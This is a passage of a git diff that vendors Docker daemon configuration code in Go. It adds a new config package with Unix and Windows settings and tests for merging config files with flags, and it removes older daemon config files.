CommonConfig: CommonConfig{ + MaxConcurrentUploads: &minusNumber, + // This is weird... + ValuesSet: map[string]interface{}{ + "max-concurrent-uploads": -1, + }, + }, + }, + }, + { + config: &Config{ + CommonConfig: CommonConfig{ + NodeGenericResources: []string{"foo=bar", "foo=baz"}, + }, + }, + }, + { + config: &Config{ + CommonConfig: CommonConfig{ + NodeGenericResources: []string{"foo=1"}, + }, + }, + }, + } + for _, tc := range testCases { + err := Validate(tc.config) + if err != nil { + t.Fatalf("expected no error, got error %v", err) + } + } +} + +func TestModifiedDiscoverySettings(t *testing.T) { + cases := []struct { + current *Config + modified *Config + expected bool + }{ + { + current: discoveryConfig("foo", "bar", map[string]string{}), + modified: discoveryConfig("foo", "bar", map[string]string{}), + expected: false, + }, + { + current: discoveryConfig("foo", "bar", map[string]string{"foo": "bar"}), + modified: discoveryConfig("foo", "bar", map[string]string{"foo": "bar"}), + expected: false, + }, + { + current: discoveryConfig("foo", "bar", map[string]string{}), + modified: discoveryConfig("foo", "bar", nil), + expected: false, + }, + { + current: discoveryConfig("foo", "bar", nil), + modified: discoveryConfig("foo", "bar", map[string]string{}), + expected: false, + }, + { + current: discoveryConfig("foo", "bar", nil), + modified: discoveryConfig("baz", "bar", nil), + expected: true, + }, + { + current: discoveryConfig("foo", "bar", nil), + modified: discoveryConfig("foo", "baz", nil), + expected: true, + }, + { + current: discoveryConfig("foo", "bar", nil), + modified: discoveryConfig("foo", "bar", map[string]string{"foo": "bar"}), + expected: true, + }, + } + + for _, c := range cases { + got := ModifiedDiscoverySettings(c.current, c.modified.ClusterStore, c.modified.ClusterAdvertise, c.modified.ClusterOpts) + if c.expected != got { + t.Fatalf("expected %v, got %v: current config %v, new config %v", c.expected, got, c.current, c.modified) + } + } +} + +func discoveryConfig(backendAddr, advertiseAddr string, opts map[string]string) *Config { + return &Config{ + CommonConfig: CommonConfig{ + ClusterStore: backendAddr, + ClusterAdvertise: advertiseAddr, + ClusterOpts: opts, + }, + } +} + +// TestReloadSetConfigFileNotExist tests that when `--config-file` is set +// and it doesn't exist the `Reload` function returns an error. +func TestReloadSetConfigFileNotExist(t *testing.T) { + configFile := "/tmp/blabla/not/exists/config.json" + flags := pflag.NewFlagSet("test", pflag.ContinueOnError) + flags.String("config-file", "", "") + flags.Set("config-file", configFile) + + err := Reload(configFile, flags, func(c *Config) {}) + assert.Check(t, is.ErrorContains(err, "unable to configure the Docker daemon with file")) +} + +// TestReloadDefaultConfigNotExist tests that if the default configuration file +// doesn't exist the daemon still will be reloaded. +func TestReloadDefaultConfigNotExist(t *testing.T) { + skip.If(t, os.Getuid() != 0, "skipping test that requires root") + reloaded := false + configFile := "/etc/docker/daemon.json" + flags := pflag.NewFlagSet("test", pflag.ContinueOnError) + flags.String("config-file", configFile, "") + err := Reload(configFile, flags, func(c *Config) { + reloaded = true + }) + assert.Check(t, err) + assert.Check(t, reloaded) +} + +// TestReloadBadDefaultConfig tests that when `--config-file` is not set +// and the default configuration file exists and is bad return an error +func TestReloadBadDefaultConfig(t *testing.T) { + f, err := ioutil.TempFile("", "docker-config-") + if err != nil { + t.Fatal(err) + } + + configFile := f.Name() + f.Write([]byte(`{wrong: "configuration"}`)) + f.Close() + + flags := pflag.NewFlagSet("test", pflag.ContinueOnError) + flags.String("config-file", configFile, "") + err = Reload(configFile, flags, func(c *Config) {}) + assert.Check(t, is.ErrorContains(err, "unable to configure the Docker daemon with file")) +} + +func TestReloadWithConflictingLabels(t *testing.T) { + tempFile := fs.NewFile(t, "config", fs.WithContent(`{"labels":["foo=bar","foo=baz"]}`)) + defer tempFile.Remove() + configFile := tempFile.Path() + + var lbls []string + flags := pflag.NewFlagSet("test", pflag.ContinueOnError) + flags.String("config-file", configFile, "") + flags.StringSlice("labels", lbls, "") + err := Reload(configFile, flags, func(c *Config) {}) + assert.Check(t, is.ErrorContains(err, "conflict labels for foo=baz and foo=bar")) +} + +func TestReloadWithDuplicateLabels(t *testing.T) { + tempFile := fs.NewFile(t, "config", fs.WithContent(`{"labels":["foo=the-same","foo=the-same"]}`)) + defer tempFile.Remove() + configFile := tempFile.Path() + + var lbls []string + flags := pflag.NewFlagSet("test", pflag.ContinueOnError) + flags.String("config-file", configFile, "") + flags.StringSlice("labels", lbls, "") + err := Reload(configFile, flags, func(c *Config) {}) + assert.Check(t, err) +} diff --git a/vendor/github.com/docker/docker/daemon/config/config_unix.go b/vendor/github.com/docker/docker/daemon/config/config_unix.go new file mode 100644 index 0000000000..1970928f9b --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/config/config_unix.go @@ -0,0 +1,87 @@ +// +build linux freebsd + +package config // import "github.com/docker/docker/daemon/config" + +import ( + "fmt" + + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/opts" + "github.com/docker/go-units" +) + +const ( + // DefaultIpcMode is default for container's IpcMode, if not set otherwise + DefaultIpcMode = "shareable" // TODO: change to private +) + +// Config defines the configuration of a docker daemon. +// It includes json tags to deserialize configuration from a file +// using the same names that the flags in the command line uses. +type Config struct { + CommonConfig + + // These fields are common to all unix platforms. + CommonUnixConfig + // Fields below here are platform specific. + CgroupParent string `json:"cgroup-parent,omitempty"` + EnableSelinuxSupport bool `json:"selinux-enabled,omitempty"` + RemappedRoot string `json:"userns-remap,omitempty"` + Ulimits map[string]*units.Ulimit `json:"default-ulimits,omitempty"` + CPURealtimePeriod int64 `json:"cpu-rt-period,omitempty"` + CPURealtimeRuntime int64 `json:"cpu-rt-runtime,omitempty"` + OOMScoreAdjust int `json:"oom-score-adjust,omitempty"` + Init bool `json:"init,omitempty"` + InitPath string `json:"init-path,omitempty"` + SeccompProfile string `json:"seccomp-profile,omitempty"` + ShmSize opts.MemBytes `json:"default-shm-size,omitempty"` + NoNewPrivileges bool `json:"no-new-privileges,omitempty"` + IpcMode string `json:"default-ipc-mode,omitempty"` +} + +// BridgeConfig stores all the bridge driver specific +// configuration. +type BridgeConfig struct { + commonBridgeConfig + + // These fields are common to all unix platforms. + commonUnixBridgeConfig + + // Fields below here are platform specific. + EnableIPv6 bool `json:"ipv6,omitempty"` + EnableIPTables bool `json:"iptables,omitempty"` + EnableIPForward bool `json:"ip-forward,omitempty"` + EnableIPMasq bool `json:"ip-masq,omitempty"` + EnableUserlandProxy bool `json:"userland-proxy,omitempty"` + UserlandProxyPath string `json:"userland-proxy-path,omitempty"` + FixedCIDRv6 string `json:"fixed-cidr-v6,omitempty"` +} + +// IsSwarmCompatible defines if swarm mode can be enabled in this config +func (conf *Config) IsSwarmCompatible() error { + if conf.ClusterStore != "" || conf.ClusterAdvertise != "" { + return fmt.Errorf("--cluster-store and --cluster-advertise daemon configurations are incompatible with swarm mode") + } + if conf.LiveRestoreEnabled { + return fmt.Errorf("--live-restore daemon configuration is incompatible with swarm mode") + } + return nil +} + +func verifyDefaultIpcMode(mode string) error { + const hint = "Use \"shareable\" or \"private\"." + + dm := containertypes.IpcMode(mode) + if !dm.Valid() { + return fmt.Errorf("Default IPC mode setting (%v) is invalid. "+hint, dm) + } + if dm != "" && !dm.IsPrivate() && !dm.IsShareable() { + return fmt.Errorf("IPC mode \"%v\" is not supported as default value. "+hint, dm) + } + return nil +} + +// ValidatePlatformConfig checks if any platform-specific configuration settings are invalid. +func (conf *Config) ValidatePlatformConfig() error { + return verifyDefaultIpcMode(conf.IpcMode) +} diff --git a/vendor/github.com/docker/docker/daemon/config/config_unix_test.go b/vendor/github.com/docker/docker/daemon/config/config_unix_test.go new file mode 100644 index 0000000000..529b677705 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/config/config_unix_test.go @@ -0,0 +1,134 @@ +// +build !windows + +package config // import "github.com/docker/docker/daemon/config" + +import ( + "testing" + + "github.com/docker/docker/opts" + "github.com/docker/go-units" + "github.com/spf13/pflag" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/fs" +) + +func TestGetConflictFreeConfiguration(t *testing.T) { + configFileData := ` + { + "debug": true, + "default-ulimits": { + "nofile": { + "Name": "nofile", + "Hard": 2048, + "Soft": 1024 + } + }, + "log-opts": { + "tag": "test_tag" + } + }` + + file := fs.NewFile(t, "docker-config", fs.WithContent(configFileData)) + defer file.Remove() + + flags := pflag.NewFlagSet("test", pflag.ContinueOnError) + var debug bool + flags.BoolVarP(&debug, "debug", "D", false, "") + flags.Var(opts.NewNamedUlimitOpt("default-ulimits", nil), "default-ulimit", "") + flags.Var(opts.NewNamedMapOpts("log-opts", nil, nil), "log-opt", "") + + cc, err := getConflictFreeConfiguration(file.Path(), flags) + assert.NilError(t, err) + + assert.Check(t, cc.Debug) + + expectedUlimits := map[string]*units.Ulimit{ + "nofile": { + Name: "nofile", + Hard: 2048, + Soft: 1024, + }, + } + + assert.Check(t, is.DeepEqual(expectedUlimits, cc.Ulimits)) +} + +func TestDaemonConfigurationMerge(t *testing.T) { + configFileData := ` + { + "debug": true, + "default-ulimits": { + "nofile": { + "Name": "nofile", + "Hard": 2048, + "Soft": 1024 + } + }, + "log-opts": { + "tag": "test_tag" + } + }` + + file := fs.NewFile(t, "docker-config", fs.WithContent(configFileData)) + defer file.Remove() + + c := &Config{ + CommonConfig: CommonConfig{ + AutoRestart: true, + LogConfig: LogConfig{ + Type: "syslog", + Config: map[string]string{"tag": "test"}, + }, + }, + } + + flags := pflag.NewFlagSet("test", pflag.ContinueOnError) + + var debug bool + flags.BoolVarP(&debug, "debug", "D", false, "") + flags.Var(opts.NewNamedUlimitOpt("default-ulimits", nil), "default-ulimit", "") + flags.Var(opts.NewNamedMapOpts("log-opts", nil, nil), "log-opt", "") + + cc, err := MergeDaemonConfigurations(c, flags, file.Path()) + assert.NilError(t, err) + + assert.Check(t, cc.Debug) + assert.Check(t, cc.AutoRestart) + + expectedLogConfig := LogConfig{ + Type: "syslog", + Config: map[string]string{"tag": "test_tag"}, + } + + assert.Check(t, is.DeepEqual(expectedLogConfig, cc.LogConfig)) + + expectedUlimits := map[string]*units.Ulimit{ + "nofile": { + Name: "nofile", + Hard: 2048, + Soft: 1024, + }, + } + + assert.Check(t, is.DeepEqual(expectedUlimits, cc.Ulimits)) +} + +func TestDaemonConfigurationMergeShmSize(t *testing.T) { + data := `{"default-shm-size": "1g"}` + + file := fs.NewFile(t, "docker-config", fs.WithContent(data)) + defer file.Remove() + + c := &Config{} + + flags := pflag.NewFlagSet("test", pflag.ContinueOnError) + shmSize := opts.MemBytes(DefaultShmSize) + flags.Var(&shmSize, "default-shm-size", "") + + cc, err := MergeDaemonConfigurations(c, flags, file.Path()) + assert.NilError(t, err) + + expectedValue := 1 * 1024 * 1024 * 1024 + assert.Check(t, is.Equal(int64(expectedValue), cc.ShmSize.Value())) +} diff --git a/vendor/github.com/docker/docker/daemon/config/config_windows.go b/vendor/github.com/docker/docker/daemon/config/config_windows.go new file mode 100644 index 0000000000..0aa7d54bf2 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/config/config_windows.go @@ -0,0 +1,57 @@ +package config // import "github.com/docker/docker/daemon/config" + +import ( + "github.com/docker/docker/api/types" +) + +// BridgeConfig stores all the bridge driver specific +// configuration. +type BridgeConfig struct { + commonBridgeConfig +} + +// Config defines the configuration of a docker daemon. +// These are the configuration settings that you pass +// to the docker daemon when you launch it with say: `dockerd -e windows` +type Config struct { + CommonConfig + + // Fields below here are platform specific. (There are none presently + // for the Windows daemon.) +} + +// GetRuntime returns the runtime path and arguments for a given +// runtime name +func (conf *Config) GetRuntime(name string) *types.Runtime { + return nil +} + +// GetInitPath returns the configure docker-init path +func (conf *Config) GetInitPath() string { + return "" +} + +// GetDefaultRuntimeName returns the current default runtime +func (conf *Config) GetDefaultRuntimeName() string { + return StockRuntimeName +} + +// GetAllRuntimes returns a copy of the runtimes map +func (conf *Config) GetAllRuntimes() map[string]types.Runtime { + return map[string]types.Runtime{} +} + +// GetExecRoot returns the user configured Exec-root +func (conf *Config) GetExecRoot() string { + return "" +} + +// IsSwarmCompatible defines if swarm mode can be enabled in this config +func (conf *Config) IsSwarmCompatible() error { + return nil +} + +// ValidatePlatformConfig checks if any platform-specific configuration settings are invalid. +func (conf *Config) ValidatePlatformConfig() error { + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/config/config_windows_test.go b/vendor/github.com/docker/docker/daemon/config/config_windows_test.go new file mode 100644 index 0000000000..09417ee388 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/config/config_windows_test.go @@ -0,0 +1,60 @@ +// +build windows + +package config // import "github.com/docker/docker/daemon/config" + +import ( + "io/ioutil" + "testing" + + "github.com/docker/docker/opts" + "github.com/spf13/pflag" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestDaemonConfigurationMerge(t *testing.T) { + f, err := ioutil.TempFile("", "docker-config-") + if err != nil { + t.Fatal(err) + } + + configFile := f.Name() + + f.Write([]byte(` + { + "debug": true, + "log-opts": { + "tag": "test_tag" + } + }`)) + + f.Close() + + c := &Config{ + CommonConfig: CommonConfig{ + AutoRestart: true, + LogConfig: LogConfig{ + Type: "syslog", + Config: map[string]string{"tag": "test"}, + }, + }, + } + + flags := pflag.NewFlagSet("test", pflag.ContinueOnError) + var debug bool + flags.BoolVarP(&debug, "debug", "D", false, "") + flags.Var(opts.NewNamedMapOpts("log-opts", nil, nil), "log-opt", "") + + cc, err := MergeDaemonConfigurations(c, flags, configFile) + assert.NilError(t, err) + + assert.Check(t, cc.Debug) + assert.Check(t, cc.AutoRestart) + + expectedLogConfig := LogConfig{ + Type: "syslog", + Config: map[string]string{"tag": "test_tag"}, + } + + assert.Check(t, is.DeepEqual(expectedLogConfig, cc.LogConfig)) +} diff --git a/vendor/github.com/docker/docker/daemon/config/opts.go b/vendor/github.com/docker/docker/daemon/config/opts.go new file mode 100644 index 0000000000..8b114929fb --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/config/opts.go @@ -0,0 +1,22 @@ +package config // import "github.com/docker/docker/daemon/config" + +import ( + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/daemon/cluster/convert" + "github.com/docker/swarmkit/api/genericresource" +) + +// ParseGenericResources parses and validates the specified string as a list of GenericResource +func ParseGenericResources(value []string) ([]swarm.GenericResource, error) { + if len(value) == 0 { + return nil, nil + } + + resources, err := genericresource.Parse(value) + if err != nil { + return nil, err + } + + obj := convert.GenericResourcesFromGRPC(resources) + return obj, nil +} diff --git a/vendor/github.com/docker/docker/daemon/config_common_unix.go b/vendor/github.com/docker/docker/daemon/config_common_unix.go deleted file mode 100644 index ab76fe7b1b..0000000000 --- a/vendor/github.com/docker/docker/daemon/config_common_unix.go +++ /dev/null @@ -1,90 +0,0 @@ -// +build solaris linux freebsd - -package daemon - -import ( - "net" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/opts" - runconfigopts "github.com/docker/docker/runconfig/opts" - "github.com/spf13/pflag" -) - -// CommonUnixConfig defines configuration of a docker daemon that is -// common across Unix platforms. -type CommonUnixConfig struct { - ExecRoot string `json:"exec-root,omitempty"` - ContainerdAddr string `json:"containerd,omitempty"` - Runtimes map[string]types.Runtime `json:"runtimes,omitempty"` - DefaultRuntime string `json:"default-runtime,omitempty"` -} - -type commonUnixBridgeConfig struct { - DefaultIP net.IP `json:"ip,omitempty"` - IP string `json:"bip,omitempty"` - DefaultGatewayIPv4 net.IP `json:"default-gateway,omitempty"` - DefaultGatewayIPv6 net.IP `json:"default-gateway-v6,omitempty"` - InterContainerCommunication bool `json:"icc,omitempty"` -} - -// InstallCommonUnixFlags adds command-line options to the top-level flag parser for -// the current process that are common across Unix platforms. -func (config *Config) InstallCommonUnixFlags(flags *pflag.FlagSet) { - config.Runtimes = make(map[string]types.Runtime) - - flags.StringVarP(&config.SocketGroup, "group", "G", "docker", "Group for the unix socket") - flags.StringVar(&config.bridgeConfig.IP, "bip", "", "Specify network bridge IP") - flags.StringVarP(&config.bridgeConfig.Iface, "bridge", "b", "", "Attach containers to a network bridge") - flags.StringVar(&config.bridgeConfig.FixedCIDR, "fixed-cidr", "", "IPv4 subnet for fixed IPs") - flags.Var(opts.NewIPOpt(&config.bridgeConfig.DefaultGatewayIPv4, ""), "default-gateway", "Container default gateway IPv4 address") - flags.Var(opts.NewIPOpt(&config.bridgeConfig.DefaultGatewayIPv6, ""), "default-gateway-v6", "Container default gateway IPv6 address") - flags.BoolVar(&config.bridgeConfig.InterContainerCommunication, "icc", true, "Enable inter-container communication") - flags.Var(opts.NewIPOpt(&config.bridgeConfig.DefaultIP, "0.0.0.0"), "ip", "Default IP when binding container ports") - flags.Var(runconfigopts.NewNamedRuntimeOpt("runtimes", &config.Runtimes, stockRuntimeName), "add-runtime", "Register an additional OCI compatible runtime") - flags.StringVar(&config.DefaultRuntime, "default-runtime", stockRuntimeName, "Default OCI runtime for containers") - -} - -// GetRuntime returns the runtime path and arguments for a given -// runtime name -func (config *Config) GetRuntime(name string) *types.Runtime { - config.reloadLock.Lock() - defer config.reloadLock.Unlock() - if rt, ok := config.Runtimes[name]; ok { - return &rt - } - return nil -} - -// GetDefaultRuntimeName returns the current default runtime -func (config *Config) GetDefaultRuntimeName() string { - config.reloadLock.Lock() - rt := config.DefaultRuntime - config.reloadLock.Unlock() - - return rt -} - -// GetAllRuntimes returns a copy of the runtimes map -func (config *Config) GetAllRuntimes() map[string]types.Runtime { - config.reloadLock.Lock() - rts := config.Runtimes - config.reloadLock.Unlock() - return rts -} - -// GetExecRoot returns the user configured Exec-root -func (config *Config) GetExecRoot() string { - return config.ExecRoot -} - -// GetInitPath returns the configure docker-init path -func (config *Config) GetInitPath() string { - config.reloadLock.Lock() - defer config.reloadLock.Unlock() - if config.InitPath != "" { - return config.InitPath - } - return DefaultInitBinary -} diff --git a/vendor/github.com/docker/docker/daemon/config_experimental.go b/vendor/github.com/docker/docker/daemon/config_experimental.go deleted file mode 100644 index 963a51e5a3..0000000000 --- a/vendor/github.com/docker/docker/daemon/config_experimental.go +++ /dev/null @@ -1,8 +0,0 @@ -package daemon - -import ( - "github.com/spf13/pflag" -) - -func (config *Config) attachExperimentalFlags(cmd *pflag.FlagSet) { -} diff --git a/vendor/github.com/docker/docker/daemon/config_solaris.go b/vendor/github.com/docker/docker/daemon/config_solaris.go deleted file mode 100644 index bc18ccd7e4..0000000000 --- a/vendor/github.com/docker/docker/daemon/config_solaris.go +++ /dev/null @@ -1,47 +0,0 @@ -package daemon - -import ( - "github.com/spf13/pflag" -) - -var ( - defaultPidFile = "/system/volatile/docker/docker.pid" - defaultGraph = "/var/lib/docker" - defaultExec = "zones" -) - -// Config defines the configuration of a docker daemon. -// These are the configuration settings that you pass -// to the docker daemon when you launch it with say: `docker -d -e lxc` -type Config struct { - CommonConfig - - // These fields are common to all unix platforms. - CommonUnixConfig -} - -// bridgeConfig stores all the bridge driver specific -// configuration. -type bridgeConfig struct { - commonBridgeConfig - - // Fields below here are platform specific. - commonUnixBridgeConfig -} - -// InstallFlags adds command-line options to the top-level flag parser for -// the current process. -func (config *Config) InstallFlags(flags *pflag.FlagSet) { - // First handle install flags which are consistent cross-platform - config.InstallCommonFlags(flags) - - // Then install flags common to unix platforms - config.InstallCommonUnixFlags(flags) - - // Then platform-specific install flags - config.attachExperimentalFlags(flags) -} - -func (config *Config) isSwarmCompatible() error { - return nil -} diff --git a/vendor/github.com/docker/docker/daemon/config_test.go b/vendor/github.com/docker/docker/daemon/config_test.go deleted file mode 100644 index 90f6a1277f..0000000000 --- a/vendor/github.com/docker/docker/daemon/config_test.go +++ /dev/null @@ -1,229 +0,0 @@ -package daemon - -import ( - "io/ioutil" - "os" - "runtime" - "strings" - "testing" - - "github.com/docker/docker/opts" - "github.com/docker/docker/pkg/testutil/assert" - "github.com/spf13/pflag" -) - -func TestDaemonConfigurationNotFound(t *testing.T) { - _, err := MergeDaemonConfigurations(&Config{}, nil, "/tmp/foo-bar-baz-docker") - if err == nil || !os.IsNotExist(err) { - t.Fatalf("expected does not exist error, got %v", err) - } -} - -func TestDaemonBrokenConfiguration(t *testing.T) { - f, err := ioutil.TempFile("", "docker-config-") - if err != nil { - t.Fatal(err) - } - - configFile := f.Name() - f.Write([]byte(`{"Debug": tru`)) - f.Close() - - _, err = MergeDaemonConfigurations(&Config{}, nil, configFile) - if err == nil { - t.Fatalf("expected error, got %v", err) - } -} - -func TestParseClusterAdvertiseSettings(t *testing.T) { - if runtime.GOOS == "solaris" { - t.Skip("ClusterSettings not supported on Solaris\n") - } - _, err := parseClusterAdvertiseSettings("something", "") - if err != errDiscoveryDisabled { - t.Fatalf("expected discovery disabled error, got %v\n", err) - } - - _, err = parseClusterAdvertiseSettings("", "something") - if err == nil { - t.Fatalf("expected discovery store error, got %v\n", err) - } - - _, err = parseClusterAdvertiseSettings("etcd", "127.0.0.1:8080") - if err != nil { - t.Fatal(err) - } -} - -func TestFindConfigurationConflicts(t *testing.T) { - config := map[string]interface{}{"authorization-plugins": "foobar"} - flags := pflag.NewFlagSet("test", pflag.ContinueOnError) - - flags.String("authorization-plugins", "", "") - assert.NilError(t, flags.Set("authorization-plugins", "asdf")) - - assert.Error(t, - findConfigurationConflicts(config, flags), - "authorization-plugins: (from flag: asdf, from file: foobar)") -} - -func TestFindConfigurationConflictsWithNamedOptions(t *testing.T) { - config := map[string]interface{}{"hosts": []string{"qwer"}} - flags := pflag.NewFlagSet("test", pflag.ContinueOnError) - - var hosts []string - flags.VarP(opts.NewNamedListOptsRef("hosts", &hosts, opts.ValidateHost), "host", "H", "Daemon socket(s) to connect to") - assert.NilError(t, flags.Set("host", "tcp://127.0.0.1:4444")) - assert.NilError(t, flags.Set("host", "unix:///var/run/docker.sock")) - - assert.Error(t, findConfigurationConflicts(config, flags), "hosts") -} - -func TestDaemonConfigurationMergeConflicts(t *testing.T) { - f, err := ioutil.TempFile("", "docker-config-") - if err != nil { - t.Fatal(err) - } - - configFile := f.Name() - f.Write([]byte(`{"debug": true}`)) - f.Close() - - flags := pflag.NewFlagSet("test", pflag.ContinueOnError) - flags.Bool("debug", false, "") - flags.Set("debug", "false") - - _, err = MergeDaemonConfigurations(&Config{}, flags, configFile) - if err == nil { - t.Fatal("expected error, got nil") - } - if !strings.Contains(err.Error(), "debug") { - t.Fatalf("expected debug conflict, got %v", err) - } -} - -func TestDaemonConfigurationMergeConflictsWithInnerStructs(t *testing.T) { - f, err := ioutil.TempFile("", "docker-config-") - if err != nil { - t.Fatal(err) - } - - configFile := f.Name() - f.Write([]byte(`{"tlscacert": "/etc/certificates/ca.pem"}`)) - f.Close() - - flags := pflag.NewFlagSet("test", pflag.ContinueOnError) - flags.String("tlscacert", "", "") - flags.Set("tlscacert", "~/.docker/ca.pem") - - _, err = MergeDaemonConfigurations(&Config{}, flags, configFile) - if err == nil { - t.Fatal("expected error, got nil") - } - if !strings.Contains(err.Error(), "tlscacert") { - t.Fatalf("expected tlscacert conflict, got %v", err) - } -} - -func TestFindConfigurationConflictsWithUnknownKeys(t *testing.T) { - config := map[string]interface{}{"tls-verify": "true"} - flags := pflag.NewFlagSet("test", pflag.ContinueOnError) - - flags.Bool("tlsverify", false, "") - err := findConfigurationConflicts(config, flags) - if err == nil { - t.Fatal("expected error, got nil") - } - if !strings.Contains(err.Error(), "the following directives don't match any configuration option: tls-verify") { - t.Fatalf("expected tls-verify conflict, got %v", err) - } -} - -func TestFindConfigurationConflictsWithMergedValues(t *testing.T) { - var hosts []string - config := map[string]interface{}{"hosts": "tcp://127.0.0.1:2345"} - flags := pflag.NewFlagSet("base", pflag.ContinueOnError) - flags.VarP(opts.NewNamedListOptsRef("hosts", &hosts, nil), "host", "H", "") - - err := findConfigurationConflicts(config, flags) - if err != nil { - t.Fatal(err) - } - - flags.Set("host", "unix:///var/run/docker.sock") - err = findConfigurationConflicts(config, flags) - if err == nil { - t.Fatal("expected error, got nil") - } - if !strings.Contains(err.Error(), "hosts: (from flag: [unix:///var/run/docker.sock], from file: tcp://127.0.0.1:2345)") { - t.Fatalf("expected hosts conflict, got %v", err) - } -} - -func TestValidateConfiguration(t *testing.T) { - c1 := &Config{ - CommonConfig: CommonConfig{ - Labels: []string{"one"}, - }, - } - - err := ValidateConfiguration(c1) - if err == nil { - t.Fatal("expected error, got nil") - } - - c2 := &Config{ - CommonConfig: CommonConfig{ - Labels: []string{"one=two"}, - }, - } - - err = ValidateConfiguration(c2) - if err != nil { - t.Fatalf("expected no error, got error %v", err) - } - - c3 := &Config{ - CommonConfig: CommonConfig{ - DNS: []string{"1.1.1.1"}, - }, - } - - err = ValidateConfiguration(c3) - if err != nil { - t.Fatalf("expected no error, got error %v", err) - } - - c4 := &Config{ - CommonConfig: CommonConfig{ - DNS: []string{"1.1.1.1o"}, - }, - } - - err = ValidateConfiguration(c4) - if err == nil { - t.Fatal("expected error, got nil") - } - - c5 := &Config{ - CommonConfig: CommonConfig{ - DNSSearch: []string{"a.b.c"}, - }, - } - - err = ValidateConfiguration(c5) - if err != nil { - t.Fatalf("expected no error, got error %v", err) - } - - c6 := &Config{ - CommonConfig: CommonConfig{ - DNSSearch: []string{"123456"}, - }, - } - - err = ValidateConfiguration(c6) - if err == nil { - t.Fatal("expected error, got nil") - } -} diff --git a/vendor/github.com/docker/docker/daemon/config_unix.go b/vendor/github.com/docker/docker/daemon/config_unix.go deleted file mode 100644 index d0957884b3..0000000000 --- a/vendor/github.com/docker/docker/daemon/config_unix.go +++ /dev/null @@ -1,104 +0,0 @@ -// +build linux freebsd - -package daemon - -import ( - "fmt" - - runconfigopts "github.com/docker/docker/runconfig/opts" - units "github.com/docker/go-units" - "github.com/spf13/pflag" -) - -var ( - defaultPidFile = "/var/run/docker.pid" - defaultGraph = "/var/lib/docker" - defaultExecRoot = "/var/run/docker" -) - -// Config defines the configuration of a docker daemon. -// It includes json tags to deserialize configuration from a file -// using the same names that the flags in the command line uses. -type Config struct { - CommonConfig - - // These fields are common to all unix platforms. - CommonUnixConfig - - // Fields below here are platform specific. - CgroupParent string `json:"cgroup-parent,omitempty"` - EnableSelinuxSupport bool `json:"selinux-enabled,omitempty"` - RemappedRoot string `json:"userns-remap,omitempty"` - Ulimits map[string]*units.Ulimit `json:"default-ulimits,omitempty"` - CPURealtimePeriod int64 `json:"cpu-rt-period,omitempty"` - CPURealtimeRuntime int64 `json:"cpu-rt-runtime,omitempty"` - OOMScoreAdjust int `json:"oom-score-adjust,omitempty"` - Init bool `json:"init,omitempty"` - InitPath string `json:"init-path,omitempty"` - SeccompProfile string `json:"seccomp-profile,omitempty"` -} - -// bridgeConfig stores all the bridge driver specific -// configuration. -type bridgeConfig struct { - commonBridgeConfig - - // These fields are common to all unix platforms. - commonUnixBridgeConfig - - // Fields below here are platform specific. - EnableIPv6 bool `json:"ipv6,omitempty"` - EnableIPTables bool `json:"iptables,omitempty"` - EnableIPForward bool `json:"ip-forward,omitempty"` - EnableIPMasq bool `json:"ip-masq,omitempty"` - EnableUserlandProxy bool `json:"userland-proxy,omitempty"` - UserlandProxyPath string `json:"userland-proxy-path,omitempty"` - FixedCIDRv6 string `json:"fixed-cidr-v6,omitempty"` -} - -// InstallFlags adds flags to the pflag.FlagSet to configure the daemon -func (config *Config) InstallFlags(flags *pflag.FlagSet) { - // First handle install flags which are consistent cross-platform - config.InstallCommonFlags(flags) - - // Then install flags common to unix platforms - config.InstallCommonUnixFlags(flags) - - config.Ulimits = make(map[string]*units.Ulimit) - - // Then platform-specific install flags - flags.BoolVar(&config.EnableSelinuxSupport, "selinux-enabled", false, "Enable selinux support") - flags.Var(runconfigopts.NewUlimitOpt(&config.Ulimits), "default-ulimit", "Default ulimits for containers") - flags.BoolVar(&config.bridgeConfig.EnableIPTables, "iptables", true, "Enable addition of iptables rules") - flags.BoolVar(&config.bridgeConfig.EnableIPForward, "ip-forward", true, "Enable net.ipv4.ip_forward") - flags.BoolVar(&config.bridgeConfig.EnableIPMasq, "ip-masq", true, "Enable IP masquerading") - flags.BoolVar(&config.bridgeConfig.EnableIPv6, "ipv6", false, "Enable IPv6 networking") - flags.StringVar(&config.ExecRoot, "exec-root", defaultExecRoot, "Root directory for execution state files") - flags.StringVar(&config.bridgeConfig.FixedCIDRv6, "fixed-cidr-v6", "", "IPv6 subnet for fixed IPs") - flags.BoolVar(&config.bridgeConfig.EnableUserlandProxy, "userland-proxy", true, "Use userland proxy for loopback traffic") - flags.StringVar(&config.bridgeConfig.UserlandProxyPath, "userland-proxy-path", "", "Path to the userland proxy binary") - flags.BoolVar(&config.EnableCors, "api-enable-cors", false, "Enable CORS headers in the Engine API, this is deprecated by --api-cors-header") - flags.MarkDeprecated("api-enable-cors", "Please use --api-cors-header") - flags.StringVar(&config.CgroupParent, "cgroup-parent", "", "Set parent cgroup for all containers") - flags.StringVar(&config.RemappedRoot, "userns-remap", "", "User/Group setting for user namespaces") - flags.StringVar(&config.ContainerdAddr, "containerd", "", "Path to containerd socket") - flags.BoolVar(&config.LiveRestoreEnabled, "live-restore", false, "Enable live restore of docker when containers are still running") - flags.IntVar(&config.OOMScoreAdjust, "oom-score-adjust", -500, "Set the oom_score_adj for the daemon") - flags.BoolVar(&config.Init, "init", false, "Run an init in the container to forward signals and reap processes") - flags.StringVar(&config.InitPath, "init-path", "", "Path to the docker-init binary") - flags.Int64Var(&config.CPURealtimePeriod, "cpu-rt-period", 0, "Limit the CPU real-time period in microseconds") - flags.Int64Var(&config.CPURealtimeRuntime, "cpu-rt-runtime", 0, "Limit the CPU real-time runtime in microseconds") - flags.StringVar(&config.SeccompProfile, "seccomp-profile", "", "Path to seccomp profile") - - config.attachExperimentalFlags(flags) -} - -func (config *Config) isSwarmCompatible() error { - if config.ClusterStore != "" || config.ClusterAdvertise != "" { - return fmt.Errorf("--cluster-store and --cluster-advertise daemon configurations are incompatible with swarm mode") - } - if 